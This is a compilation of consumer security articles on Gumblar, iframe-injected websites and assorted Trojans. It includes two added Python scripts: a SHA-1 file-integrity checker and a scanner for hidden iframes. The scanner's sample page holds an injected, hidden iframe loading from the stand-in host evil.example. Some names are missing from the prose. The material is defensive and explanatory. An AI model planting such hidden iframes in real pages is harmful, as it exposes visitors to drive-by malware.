Thought the Conficker Virus Was Bad? Gumblar Is Even Worse.
by Terrence O'Brien — Jun 2nd 2009 at 7:19AM

If you thought Conficker was bad, meet Gumblar. If malware programs were comic book villains,
Conficker would be Kingpin -- evil for sure, but really just a big bully. Gumblar on the other hand would
be Galactus -- massive, all-powerful, evil, and extremely difficult to defeat.

ScanSafe, a computer security firm, has been tracking the progress of the worm since its arrival on the
scene in March, according to CNET. Originally, the attack spread through infectious code that was
planted in hacked Web sites and then downloaded malware from the domain on to victims'
computers. But that was just the opening salvo. As Web site operators cleaned their pages of the code,
Gumblar replaced the original material with dynamically generated JavaScript (Web site code that is
created on the spot instead of being completely determined beforehand -- a key element of Web apps
like Gmail) that is much harder for security software to detect and remove.

The evolved version also went about adding new domains to the list of sources for downloading its
malware payload, including and, and began exploiting security holes
in Flash and Adobe Reader. The worm also searches out credentials for FTP servers (a method for
uploading files to a Web site) on a victim's computer, using them to infect additional Web sites.

It's not clear how many sites Gumblar has infected, but security firms seem to agree that it accounts for
about 40 percent of all new malware infections right now. According to ScanSafe, in just the first two
weeks of May over 3,000 Web sites were compromised and spreading the worm. Most sites have been
quick to clean up the infections as best they can, but, even if all the infected pages were removed,
Gumblar would still have an army of infected PCs (see botnet) to inflict further damage. Already infected
PCs could be used to hijack even more Web sites, by searching out logon information for Web servers
and uploading their malicious payload. Compromised PCs can also be instructed to install Trojans that
steal data and passwords.

The danger posed by Gumblar is so great that ScanSafe suggests a full reformat and reinstallation of
Windows to clean out an infection. It also suggests changing all of your passwords and usernames after
securing your PC.

Detecting an infection is complex, and not fool-proof. According to ScanSafe the best way to find out if
your PC has been hijacked by Gumblar is to follow CNET's well laid out steps:

1) Locate the file sqlsodbc.chm in the Windows system folder (in Windows XP open My Computer then
go to Local Disk (C:) --> Windows --> System32)

2) Obtain the Sha1 of the installed sqlsodbc.chm using FileAlyzer, a free tool for obtaining the Sha1 of a
file. If you've never heard of Sha1 before, don't panic. It's a sort of automatically generated digital
identifier for files designed by the NSA, and used by security applications to confirm that a file is what it
is supposed to be.

3) Compare the obtained Sha1 code and the file's size to the list located on the ScanSafe STAT Blog.

4) If the Sha1 and corresponding file size do not match with a pair on the reference list, it's a potential
sign of a Gumblar infection.
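Steps 2 to 4 above are a file integrity check: hash the file, note its size, and compare the pair against a list of known-good values. The script below is an added example and is not code from the article, from ScanSafe, or from FileAlyzer; it computes the SHA-1 and size of a file and reports whether the pair is on a reference list. The `REFERENCE_PAIRS` set is a placeholder: the real (SHA-1, size) pairs for legitimate `sqlsodbc.chm` builds are on the ScanSafe STAT Blog and are not reproduced here, so the script must be filled in from that list before its result means anything. The Windows XP path is the one named in step 1; the function names are my own.

```python
import hashlib
import os
import sys

# PLACEHOLDER reference list (constructed): replace with the (sha1, size)
# pairs published on the ScanSafe STAT Blog. The entry below matches nothing real.
REFERENCE_PAIRS = {
    ("0000000000000000000000000000000000000000", 0),
}

# Location named in step 1 for Windows XP (assumed path; adjust for other versions).
DEFAULT_PATH = r"C:\Windows\System32\sqlsodbc.chm"


def sha1_and_size(path, chunk_size=65536):
    """Return (hex SHA-1 digest, size in bytes) of the file at `path`.

    The file is hashed in chunks so that a large file is never read into
    memory all at once; the size is counted from the same bytes that were
    hashed, so the two values always describe the same content."""
    digest = hashlib.sha1()
    size = 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
            size += len(chunk)
    return digest.hexdigest(), size


def matches_reference(sha1_hex, size, reference=REFERENCE_PAIRS):
    """True when the (sha1, size) pair appears together in `reference`.

    The digest comparison is case-insensitive because different tools print
    hex in different cases. Both values must match the same entry (step 4):
    a correct size with a different hash is still a mismatch."""
    normalized = {(h.lower(), s) for h, s in reference}
    return (sha1_hex.lower(), size) in normalized


def classify(path, reference=REFERENCE_PAIRS):
    """Carry out steps 2-4 and return one of three verdicts.

    'missing' is reported separately so that an absent file is not mistaken
    for a clean result; 'mismatch-investigate' is only a potential indicator,
    exactly as step 4 says, not proof of infection."""
    if not os.path.isfile(path):
        return "missing"
    sha1_hex, size = sha1_and_size(path)
    if matches_reference(sha1_hex, size, reference):
        return "reference-match"
    return "mismatch-investigate"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_PATH
    verdict = classify(target)
    if verdict == "missing":
        print(f"{target}: file not found")
    else:
        sha1_hex, size = sha1_and_size(target)
        print(f"{target}: sha1={sha1_hex} size={size} -> {verdict}")
```

Run it as `python check_sqlsodbc.py` on the XP path, or pass another path as the first argument. Because the reference set is a placeholder, every real file will come back as `mismatch-investigate` until the published pairs are pasted in; that is the safe default, since a hash check can only confirm what it has been told is good.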


Beware of the Threat From Hacked Websites
As posted on

This year, there has been a large increase in the number of legitimate websites infected by a so-called
"iframe" threat - a type of malicious script.

Several prominent websites have come under attack from hackers who have modified the underlying
code so that malware can be distributed to unsuspecting users who visit the site. When a user visits an
infected site, an invisible connection is established to a remote server, which can then attempt to install
malware on the user's computer. The intention could be to generate spam, or possibly something more
sinister, such as stealing personal information e.g. Bank account or credit card details.
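The "invisible connection" described above is made by an `<iframe>` element that the visitor never sees but that the browser still loads. Below is an added example, written for this page and not code from avast!/Alwil Software or from the article, of how a site operator might scan their own HTML for that pattern before a visitor's antivirus has to. The concealment heuristics (zero size, `display:none`, positioned far off screen) and the rule that only a concealed frame pointing at a host other than the site's own is flagged are my assumptions about what makes such a frame suspicious; the sample page, its hostnames and the function names are all constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attribute values may be None for bare attributes; normalise to ""
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values of 0 or 1 (optionally with a px suffix)."""
    m = re.match(r"^\s*(\d+)\s*(px)?\s*$", value or "")
    return bool(m) and int(m.group(1)) <= 1


def hidden_reasons(attrs, site_host):
    """Return the reasons an iframe looks concealed and/or third-party.

    Each string is one independent observation, so the caller can decide
    how many are needed before raising an alert."""
    reasons = []
    style = attrs.get("style", "").lower().replace(" ", "")
    if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
        reasons.append("zero-size")
    if "display:none" in style or "visibility:hidden" in style:
        reasons.append("css-hidden")
    if re.search(r"(left|top):-\d{3,}", style):
        reasons.append("offscreen")
    host = urlparse(attrs.get("src", "")).hostname
    if host and site_host and host.lower() != site_host.lower():
        reasons.append(f"third-party:{host}")
    return reasons


CONCEALED = {"zero-size", "css-hidden", "offscreen"}


def find_suspicious_iframes(html, site_host):
    """Return [(src, reasons)] for frames that are both concealed and
    load from a host other than `site_host` (the page's own hostname).

    A visible third-party embed (a map, a video) is not flagged, and a
    hidden same-origin frame is left alone too; the combination is what
    matches the hacked-site pattern described in the article."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        reasons = hidden_reasons(attrs, site_host)
        concealed = any(r in CONCEALED for r in reasons)
        third_party = any(r.startswith("third-party:") for r in reasons)
        if concealed and third_party:
            findings.append((attrs.get("src", ""), reasons))
    return findings


# Constructed sample: a legitimate page on example.org with one visible
# third-party embed and one injected, hidden frame to a reserved .example host.
SAMPLE_PAGE = """
<html><body>
<h1>Travel deals</h1>
<iframe src="http://example.org/player" width="640" height="360"></iframe>
<iframe src="http://maps.example.net/embed" width="400" height="300"></iframe>
<iframe src="http://evil.example/in.php" width="0" height="0"
        style="position:absolute; left:-9999px; display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "example.org"):
        print(f"suspicious iframe: {src} ({', '.join(reasons)})")
```

To use it on a real site, read each served HTML page into `find_suspicious_iframes` with the site's own hostname and review every hit by hand; a legitimate tracking pixel can trip the same rules, so the output is a list to investigate, not a verdict. Scanning the pages as the web server actually serves them (rather than the files in the repository) matters here, because the injected code is often appended to the deployed copy only.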

In 2008, several high-profile websites were targeted, including USA Today, ABC News, Target and
Walmart, and simply visiting one of these infected websites could have resulted in the user's computer
being infected. More recently, a number of websites have been detected by avast! as being infected by
a malicious script called "HTML:Iframe-inf". Among the websites affected are a number of Government
sites in the US, including the United States Forest Service, the US International Trade Commission and
the websites of several embassies around the world. Many popular travel and recreational websites
have also been compromised.

Avast! Antivirus will detect and block access to any website that is infected by this threat and will display
a warning that a virus has been detected. If avast! displays this warning, you should discontinue your
attempt to connect to that particular website and either report the infection to the relevant party so that it
can be removed, or post a message on the avast! forum in the section Viruses and Worms so that it can
be investigated to determine whether the website is really infected. Do not ignore this warning, even if
you believe the website to be a reputable one - the recent attacks prove that no websites are immune to

Thanks to one of our regular forum users who reported the infection to the organization concerned, the
website of the US International Trade Commission was quickly repaired and the infection removed,
however, potentially, many more websites remain infected.

To minimize the risk of falling victim to such an attack from this, and other similar threats, it is essential
that your Antivirus software is kept up-to-date. We recommend that your avast! Antivirus is set to update
itself automatically, or alternatively, that you perform regular manual updates, ideally daily.

Alwil Software would like to thank its regular forum users for their help in this particular case and for the
valuable support they continually provide to the rest of the avast! user community.

12 Sneakiest Computer Viruses
by Dan Reilly, posted Oct 9th 2008 at 2:00PM

The Storm Worm
This virus is one of the nastiest and most prolific out there. It's a back door Trojan - malicious software
disguised as a harmless program - that is spread to PCs via fake news and holiday greeting card e-
mails. Once infected, your computer becomes part of a botnet, a network of computers running and
spreading the malware at an alarmingly fast rate -- so essentially your computer not only slows down,
but also serves as a perpetrator of the crime. How to protect yourself? Don't open any files in e-mails
from people you don't know, turn on your e-mail program's spam prevention tool, and make sure your
virus protection software is up-to-date.

That Obama sex tape e-mail we told you about contains this devious virus. Mal/Hupig-D runs in the
background of Windows and steals your passwords, credit card information, and the like. Virus scanners
look for it now, but rely on your common sense first and don't click on that e-mail. If you're worried that
your computer might be infected with it, don't enter your passwords or credit card information until you
get it looked at by a computer professional.

Sorry, Mac users, but you're in danger too. This Trojan affects computers using Mac OS X 10.4 or 10.5,
and lets the bad guys use your Apple Remote Desktop agent for a host of disturbing activities. The virus
can be used to monitor your keystrokes, transmit passwords, turn on file sharing, take screen shots,
and, creepiest of all, take pictures with the built-in iSight camera -- all unbeknown to you! It's spread
through downloads that you have to agree to, so if you stay sharp, avoid sketchy utilities, and keep your
anti-virus protection current, you'll be fine.

The Facebook Trojan, aka Troj/Dloadr-BPL
Facebook users have probably seen it happen – a friend posts a link to a Web site on other people's
walls, urging them to see a funny video or find out who has a crush on them. Just as with spam e-mails,
the link takes you to a bogus site that tells you to download a newer version of Flash, which turns out to
be Troj/Dloadr-BPL. This virus then lets hackers take over your computer to spread spam and malware.
Basically, criminals are using Facebook because they think users are more likely to visit a link if a friend
tells them to. The solution? Don't click it, or better yet, stop using those annoying Facebook Wall
programs anyway. Be particularly wary of videos posted by people who don't usually send videos (at
least to you).

Beginning in 2005, the Zlob Trojan has been infecting computers by convincing users they need to
download a codec to view a spam or porn video. The Trojan then reroutes your Internet traffic through a
hacker's server. The end result is a computer that shuts down randomly and reboots with confusing text
messages. The newest variation of Zlob actually works on your Wi-Fi router by running through a list of
default user name and password combos, which many users never bother to change. In addition to the
usual anti-virus and trusted downloading advice, this time make sure to change your router's security
settings and passwords on a regular basis. It's that easy.

Starting around the last new year, the Mebroot virus began infiltrating computers' master boot records,
the part of the hard drive that loads the operating system, by installing itself from untrusted Web sites.
The virus installs keyloggers that are triggered when the infected computer is used to visit any of 900
financial sites, stealing user names and passwords any time they're typed (and thus eventually stealing
your money or identity). Unfortunately, this rootkit hides from most virus protection software, but you can
visit GMER to get software that scans and deletes this menace.

The Clipboard Attack
A new threat that's popped up recently uses flash banner ads to take over your computer's clipboard
through the Mozilla Firefox Web browser. You'll know your computer, either Mac or PC, is infected once
your clipboard will only paste a link to a site that sells a bogus security program. Many people are led to
the sites with the infected ads through spam e-mails purporting to come from CNN or MSNBC. It seems
you can get rid of the infection by restarting your computer or killing the Firefox process, and
downloading FlashBlockers for the browser can only help.

Agent.JEN Trojan
This crafty file is mainly getting into computers via the UPS e-mail scam we warned you about a while
ago. The Trojan comes in an attachment that purports to be an invoice for an undeliverable package,
and then stealthily allows your financial data to be stolen by foreign crooks. UPS rarely sends
attachments, so if you receive something suspicious, don't open it and contact customerservice@ups.

Penguin Panic, aka Troj/Agent-HNY
Recently, an iPhone-specific Trojan has been spreading via e-mails that offer a free game for the Apple
product. The virus hides in a file named "," which is attached to e-mails with subject
lines like "Virtual iPhone games!" and "Apple: The most popular game!" The Trojan actually infects
Windows machines, allowing hackers to take control over it. So, to protect yourself, don't download any
free games like this!

Gpcode Ransomware
This Trojan is unique in that when it infects your computer, it encrypts your files and demands payment,
usually around $100, to unlock them. Experts are still unsure how this malware is spread and how to
protect against it outside of constantly backing up your files. On the bright side, the author of the code
was recently identified as a Russian citizen, but authorities have yet to do anything about it.

FakeAV-AD Trojan
Looking for a deal on your anti-virus software? If you're not careful, you could end up downloading a
virus that'll scam you out of your hard-earned money. While there are a variety of these threats around
the Web, a current prevalent one -- the FakeAV-AD Trojan -- pretends to be a free copy of Norton
AntiVirus 2008. If you download it, you'll get a number of security alerts that tell you to buy the full
version with your credit card. Guess what happens next? The sneakiest part about this site, though, is
that it comes up as a Sponsored Link in Google if you're searching for free virus protection.

Rogue Security Applications
Last month, a family of malware called Rogue Security applications comprised over 60% of computer
threats. Much like the fake Norton link, the variations of this Trojan convince users to download security
programs that intend to control your computer and rip you off. Most often, they're downloaded from
those popup ads that say your computer is infected, leading you to download the file even if you try to
close the window. There are many versions of this Trojan, some of which resist anti-virus programs, so
be very careful, but for starters, make sure your browser's pop-up blocker is enabled.